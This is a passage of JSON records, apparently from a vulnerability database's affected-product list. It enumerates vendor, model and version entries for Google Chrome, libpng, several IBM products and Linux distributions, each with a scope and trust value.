"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1063.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.723.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.105"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.165.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.134"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.725.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.672.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.151"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.754.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.22"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.107"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1659.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.783.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.19"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.165.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.9"
},
{
"_id": null,
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1690.0"
},
{
"_id": null,
"model": "tivoli composite application manager for transactions",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3.0"
},
{
"_id": null,
"model": "enterprise linux hpc node supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.820.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1044.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.731.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.560.0"
},
{
"_id": null,
"model": "websphere real time sr fp",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3810"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.819.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.125"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1032.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.162"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.117"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.201"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.612.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.11"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "38.0.2125.122"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.153"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "cognos insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1687.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.903.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.672.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.733.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.749.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.48"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.113"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.762.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.719.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.813.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.36"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.38"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.302"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.211"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.622.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.673.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.106"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1063.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.187"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1055.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.790.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.319"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.658.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "48.0.2564.116"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1668.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.932.0"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1064.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.686.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1651.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1003.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.114"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1664.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1007.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.62"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1680.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.603.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.686.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.23"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.32"
},
{
"_id": null,
"model": "ilog optimization decision manager enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.113"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.337"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.4.0.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.38"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.29"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.33"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.37"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.98"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.87"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.119"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.896.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.59"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.152"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.657.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.334"
},
{
"_id": null,
"model": "integrated management module yuoo",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.331"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.667.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1673.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.689.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.152"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1288.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1655.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.707.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1011.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1081.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.44"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1067.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1664.1"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.801.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1048.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.807.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.94"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.865.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1296.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.121"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
